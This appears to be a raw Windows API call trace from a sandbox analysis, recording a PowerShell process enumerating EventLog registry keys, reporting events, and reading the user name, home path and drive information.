	[0776.944] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d648 | out: phkResult=0x16d648*=0x0) returned 0x2
	[0776.944] RegOpenKeyExW (in: hKey=0x340, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d648 | out: phkResult=0x16d648*=0x358) returned 0x0
	[0776.944] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d648 | out: phkResult=0x16d648*=0x0) returned 0x2
	[0776.944] RegOpenKeyExW (in: hKey=0x340, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d648 | out: phkResult=0x16d648*=0x35c) returned 0x0
	[0776.944] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d648 | out: phkResult=0x16d648*=0x0) returned 0x2
	[0776.944] RegOpenKeyExW (in: hKey=0x340, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d648 | out: phkResult=0x16d648*=0x360) returned 0x0
	[0776.944] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d648 | out: phkResult=0x16d648*=0x0) returned 0x2
	[0776.945] RegOpenKeyExW (in: hKey=0x340, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d648 | out: phkResult=0x16d648*=0x364) returned 0x0
	[0776.945] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d648 | out: phkResult=0x16d648*=0x368) returned 0x0
	[0776.945] RegCloseKey (hKey=0x368) returned 0x0
	[0776.945] RegCloseKey (hKey=0x340) returned 0x0
	[0776.946] RegCloseKey (hKey=0x364) returned 0x0
	[0776.946] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d5e8 | out: phkResult=0x16d5e8*=0x364) returned 0x0
	[0776.946] RegQueryInfoKeyW (in: hKey=0x364, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x16d55c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d558, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x16d55c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d558*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0776.946] CoTaskMemFree (pv=0x0) 
	[0776.947] CoTaskMemAlloc (cb=0x204) returned 0x263c80
	[0776.947] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x0, lpName=0x263c80, lpcchName=0x16d5e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x16d5e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0776.947] CoTaskMemFree (pv=0x263c80) 
	[0776.947] CoTaskMemFree (pv=0x0) 
	[0776.947] CoTaskMemAlloc (cb=0x204) returned 0x263c80
	[0776.947] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x1, lpName=0x263c80, lpcchName=0x16d5e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x16d5e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0776.947] CoTaskMemFree (pv=0x263c80) 
	[0776.947] CoTaskMemFree (pv=0x0) 
	[0776.947] CoTaskMemAlloc (cb=0x204) returned 0x263c80
	[0776.947] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x2, lpName=0x263c80, lpcchName=0x16d5e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x16d5e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0776.947] CoTaskMemFree (pv=0x263c80) 
	[0776.947] CoTaskMemFree (pv=0x0) 
	[0776.947] CoTaskMemAlloc (cb=0x204) returned 0x263c80
	[0776.947] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x3, lpName=0x263c80, lpcchName=0x16d5e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x16d5e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0776.948] CoTaskMemFree (pv=0x263c80) 
	[0776.948] CoTaskMemFree (pv=0x0) 
	[0776.948] CoTaskMemAlloc (cb=0x204) returned 0x263c80
	[0776.948] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x4, lpName=0x263c80, lpcchName=0x16d5e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x16d5e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0776.948] CoTaskMemFree (pv=0x263c80) 
	[0776.948] CoTaskMemFree (pv=0x0) 
	[0776.948] CoTaskMemAlloc (cb=0x204) returned 0x263c80
	[0776.948] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x5, lpName=0x263c80, lpcchName=0x16d5e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x16d5e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0776.948] CoTaskMemFree (pv=0x263c80) 
	[0776.948] CoTaskMemFree (pv=0x0) 
	[0776.948] CoTaskMemAlloc (cb=0x204) returned 0x263c80
	[0776.948] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x6, lpName=0x263c80, lpcchName=0x16d5e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x16d5e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0776.951] CoTaskMemFree (pv=0x263c80) 
	[0776.951] CoTaskMemFree (pv=0x0) 
	[0776.951] CoTaskMemAlloc (cb=0x204) returned 0x263c80
	[0776.952] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x7, lpName=0x263c80, lpcchName=0x16d5e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x16d5e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0776.952] CoTaskMemFree (pv=0x263c80) 
	[0776.952] CoTaskMemFree (pv=0x0) 
	[0776.952] CoTaskMemAlloc (cb=0x204) returned 0x263c80
	[0776.952] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x8, lpName=0x263c80, lpcchName=0x16d5e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x16d5e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0776.952] CoTaskMemFree (pv=0x263c80) 
	[0776.952] CoTaskMemFree (pv=0x0) 
	[0776.952] RegOpenKeyExW (in: hKey=0x364, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d648 | out: phkResult=0x16d648*=0x340) returned 0x0
	[0776.952] RegOpenKeyExW (in: hKey=0x340, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d648 | out: phkResult=0x16d648*=0x0) returned 0x2
	[0776.952] RegOpenKeyExW (in: hKey=0x364, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d648 | out: phkResult=0x16d648*=0x368) returned 0x0
	[0776.952] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d648 | out: phkResult=0x16d648*=0x0) returned 0x2
	[0776.953] RegOpenKeyExW (in: hKey=0x364, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d648 | out: phkResult=0x16d648*=0x36c) returned 0x0
	[0776.953] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d648 | out: phkResult=0x16d648*=0x0) returned 0x2
	[0776.953] RegOpenKeyExW (in: hKey=0x364, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d648 | out: phkResult=0x16d648*=0x370) returned 0x0
	[0776.953] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d648 | out: phkResult=0x16d648*=0x0) returned 0x2
	[0776.953] RegOpenKeyExW (in: hKey=0x364, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d648 | out: phkResult=0x16d648*=0x374) returned 0x0
	[0776.953] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d648 | out: phkResult=0x16d648*=0x0) returned 0x2
	[0776.953] RegOpenKeyExW (in: hKey=0x364, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d648 | out: phkResult=0x16d648*=0x378) returned 0x0
	[0776.953] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d648 | out: phkResult=0x16d648*=0x0) returned 0x2
	[0776.954] RegOpenKeyExW (in: hKey=0x364, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d648 | out: phkResult=0x16d648*=0x37c) returned 0x0
	[0776.954] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d648 | out: phkResult=0x16d648*=0x0) returned 0x2
	[0776.954] RegOpenKeyExW (in: hKey=0x364, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d648 | out: phkResult=0x16d648*=0x380) returned 0x0
	[0776.954] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d648 | out: phkResult=0x16d648*=0x0) returned 0x2
	[0776.954] RegOpenKeyExW (in: hKey=0x364, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d648 | out: phkResult=0x16d648*=0x384) returned 0x0
	[0776.954] RegOpenKeyExW (in: hKey=0x384, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d648 | out: phkResult=0x16d648*=0x388) returned 0x0
	[0776.954] RegCloseKey (hKey=0x388) returned 0x0
	[0776.954] RegCloseKey (hKey=0x364) returned 0x0
	[0776.955] RegCloseKey (hKey=0x384) returned 0x0
	[0776.956] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d5b8 | out: phkResult=0x16d5b8*=0x384) returned 0x0
	[0776.956] RegQueryInfoKeyW (in: hKey=0x384, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x16d52c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d528, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x16d52c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d528*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0776.956] CoTaskMemFree (pv=0x0) 
	[0776.956] CoTaskMemAlloc (cb=0x204) returned 0x263c80
	[0776.956] RegEnumKeyExW (in: hKey=0x384, dwIndex=0x0, lpName=0x263c80, lpcchName=0x16d5b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x16d5b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0776.956] CoTaskMemFree (pv=0x263c80) 
	[0776.956] CoTaskMemFree (pv=0x0) 
	[0776.956] CoTaskMemAlloc (cb=0x204) returned 0x263c80
	[0776.956] RegEnumKeyExW (in: hKey=0x384, dwIndex=0x1, lpName=0x263c80, lpcchName=0x16d5b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x16d5b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0776.956] CoTaskMemFree (pv=0x263c80) 
	[0776.956] CoTaskMemFree (pv=0x0) 
	[0776.957] CoTaskMemAlloc (cb=0x204) returned 0x263c80
	[0776.957] RegEnumKeyExW (in: hKey=0x384, dwIndex=0x2, lpName=0x263c80, lpcchName=0x16d5b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x16d5b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0776.957] CoTaskMemFree (pv=0x263c80) 
	[0776.957] CoTaskMemFree (pv=0x0) 
	[0776.957] CoTaskMemAlloc (cb=0x204) returned 0x263c80
	[0776.957] RegEnumKeyExW (in: hKey=0x384, dwIndex=0x3, lpName=0x263c80, lpcchName=0x16d5b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x16d5b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0776.957] CoTaskMemFree (pv=0x263c80) 
	[0776.957] CoTaskMemFree (pv=0x0) 
	[0776.957] CoTaskMemAlloc (cb=0x204) returned 0x263c80
	[0776.957] RegEnumKeyExW (in: hKey=0x384, dwIndex=0x4, lpName=0x263c80, lpcchName=0x16d5b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x16d5b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0776.957] CoTaskMemFree (pv=0x263c80) 
	[0776.957] CoTaskMemFree (pv=0x0) 
	[0776.957] CoTaskMemAlloc (cb=0x204) returned 0x263c80
	[0776.957] RegEnumKeyExW (in: hKey=0x384, dwIndex=0x5, lpName=0x263c80, lpcchName=0x16d5b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x16d5b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0776.958] CoTaskMemFree (pv=0x263c80) 
	[0776.958] CoTaskMemFree (pv=0x0) 
	[0776.958] CoTaskMemAlloc (cb=0x204) returned 0x263c80
	[0776.958] RegEnumKeyExW (in: hKey=0x384, dwIndex=0x6, lpName=0x263c80, lpcchName=0x16d5b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x16d5b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0776.958] CoTaskMemFree (pv=0x263c80) 
	[0776.958] CoTaskMemFree (pv=0x0) 
	[0776.958] CoTaskMemAlloc (cb=0x204) returned 0x263c80
	[0776.958] RegEnumKeyExW (in: hKey=0x384, dwIndex=0x7, lpName=0x263c80, lpcchName=0x16d5b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x16d5b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0776.958] CoTaskMemFree (pv=0x263c80) 
	[0776.958] CoTaskMemFree (pv=0x0) 
	[0776.958] CoTaskMemAlloc (cb=0x204) returned 0x263c80
	[0776.958] RegEnumKeyExW (in: hKey=0x384, dwIndex=0x8, lpName=0x263c80, lpcchName=0x16d5b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x16d5b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0776.958] CoTaskMemFree (pv=0x263c80) 
	[0776.958] CoTaskMemFree (pv=0x0) 
	[0776.958] RegOpenKeyExW (in: hKey=0x384, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d618 | out: phkResult=0x16d618*=0x364) returned 0x0
	[0776.959] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d618 | out: phkResult=0x16d618*=0x0) returned 0x2
	[0776.959] RegOpenKeyExW (in: hKey=0x384, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d618 | out: phkResult=0x16d618*=0x388) returned 0x0
	[0776.959] RegOpenKeyExW (in: hKey=0x388, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d618 | out: phkResult=0x16d618*=0x0) returned 0x2
	[0776.959] RegOpenKeyExW (in: hKey=0x384, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d618 | out: phkResult=0x16d618*=0x38c) returned 0x0
	[0776.959] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d618 | out: phkResult=0x16d618*=0x0) returned 0x2
	[0776.959] RegOpenKeyExW (in: hKey=0x384, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d618 | out: phkResult=0x16d618*=0x390) returned 0x0
	[0776.959] RegOpenKeyExW (in: hKey=0x390, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d618 | out: phkResult=0x16d618*=0x0) returned 0x2
	[0776.959] RegOpenKeyExW (in: hKey=0x384, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d618 | out: phkResult=0x16d618*=0x394) returned 0x0
	[0776.959] RegOpenKeyExW (in: hKey=0x394, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d618 | out: phkResult=0x16d618*=0x0) returned 0x2
	[0776.960] RegOpenKeyExW (in: hKey=0x384, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d618 | out: phkResult=0x16d618*=0x398) returned 0x0
	[0776.960] RegOpenKeyExW (in: hKey=0x398, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d618 | out: phkResult=0x16d618*=0x0) returned 0x2
	[0776.960] RegOpenKeyExW (in: hKey=0x384, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d618 | out: phkResult=0x16d618*=0x39c) returned 0x0
	[0776.960] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d618 | out: phkResult=0x16d618*=0x0) returned 0x2
	[0776.960] RegOpenKeyExW (in: hKey=0x384, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d618 | out: phkResult=0x16d618*=0x3a0) returned 0x0
	[0776.960] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d618 | out: phkResult=0x16d618*=0x0) returned 0x2
	[0776.960] RegOpenKeyExW (in: hKey=0x384, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d618 | out: phkResult=0x16d618*=0x3a4) returned 0x0
	[0776.961] RegOpenKeyExW (in: hKey=0x3a4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d618 | out: phkResult=0x16d618*=0x3a8) returned 0x0
	[0776.961] RegCloseKey (hKey=0x3a8) returned 0x0
	[0778.226] RegCloseKey (hKey=0x384) returned 0x0
	[0778.227] RegCloseKey (hKey=0x3a4) returned 0x0
	[0778.235] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x1b860008
	[0778.886] ReportEventW (hEventLog=0x1b860008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2e66c10*="WSMan", lpRawData=0x2e66980) returned 1
	[0778.893] CoTaskMemAlloc (cb=0x104) returned 0x2b1df0
	[0778.893] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b1df0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0778.893] CoTaskMemFree (pv=0x2b1df0) 
	[0778.895] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0778.895] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0778.895] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0778.896] CoTaskMemAlloc (cb=0x804) returned 0x1b3ee5c0
	[0778.896] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b3ee5c0, nSize=0x16d8a8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x16d8a8) returned 0x1
	[0778.896] CoTaskMemFree (pv=0x1b3ee5c0) 
	[0778.896] CoTaskMemAlloc (cb=0x204) returned 0x263c80
	[0778.896] GetUserNameW (in: lpBuffer=0x263c80, pcbBuffer=0x16d8e8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x16d8e8) returned 1
	[0778.896] CoTaskMemFree (pv=0x263c80) 
	[0778.897] ReportEventW (hEventLog=0x1b860008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2e6c148*="Alias", lpRawData=0x2e6bed8) returned 1
	[0778.906] CoTaskMemAlloc (cb=0x104) returned 0x2b1df0
	[0778.906] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b1df0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0778.906] CoTaskMemFree (pv=0x2b1df0) 
	[0778.908] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0778.908] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0778.908] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0778.908] CoTaskMemAlloc (cb=0x804) returned 0x1b3ee5c0
	[0778.908] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b3ee5c0, nSize=0x16d8a8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x16d8a8) returned 0x1
	[0778.909] CoTaskMemFree (pv=0x1b3ee5c0) 
	[0778.909] CoTaskMemAlloc (cb=0x204) returned 0x263c80
	[0778.909] GetUserNameW (in: lpBuffer=0x263c80, pcbBuffer=0x16d8e8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x16d8e8) returned 1
	[0778.909] CoTaskMemFree (pv=0x263c80) 
	[0778.910] ReportEventW (hEventLog=0x1b860008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2e71740*="Environment", lpRawData=0x2e714d0) returned 1
	[0778.928] CoTaskMemAlloc (cb=0x104) returned 0x2b1df0
	[0778.928] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b1df0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0778.928] CoTaskMemFree (pv=0x2b1df0) 
	[0778.929] CoTaskMemAlloc (cb=0x104) returned 0x2b1df0
	[0778.929] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x2b1df0, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0778.929] CoTaskMemFree (pv=0x2b1df0) 
	[0778.929] CoTaskMemAlloc (cb=0x104) returned 0x2b1df0
	[0778.929] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x2b1df0, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0778.930] CoTaskMemFree (pv=0x2b1df0) 
	[0778.930] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x16d450, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d
	[0778.930] SetErrorMode (uMode=0x1) returned 0x1
	[0778.930] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0x16d660 | out: lpFileInformation=0x16d660*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0778.930] SetErrorMode (uMode=0x1) returned 0x1
	[0778.932] GetLogicalDrives () returned 0x4
	[0778.932] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x16d1c0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0778.933] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0778.934] SetErrorMode (uMode=0x1) returned 0x1
	[0778.934] CoTaskMemAlloc (cb=0x68) returned 0x1b3cb270
	[0778.935] CoTaskMemAlloc (cb=0x68) returned 0x1b3cb0b0
	[0778.935] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1b3cb270, nVolumeNameSize=0x32, lpVolumeSerialNumber=0x16d630, lpMaximumComponentLength=0x16d62c, lpFileSystemFlags=0x16d628, lpFileSystemNameBuffer=0x1b3cb0b0, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x16d630*=0x9c354b42, lpMaximumComponentLength=0x16d62c*=0xff, lpFileSystemFlags=0x16d628*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1
	[0778.935] CoTaskMemFree (pv=0x1b3cb270) 
	[0778.935] CoTaskMemFree (pv=0x1b3cb0b0) 
	[0778.935] SetErrorMode (uMode=0x1) returned 0x1
	[0778.935] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
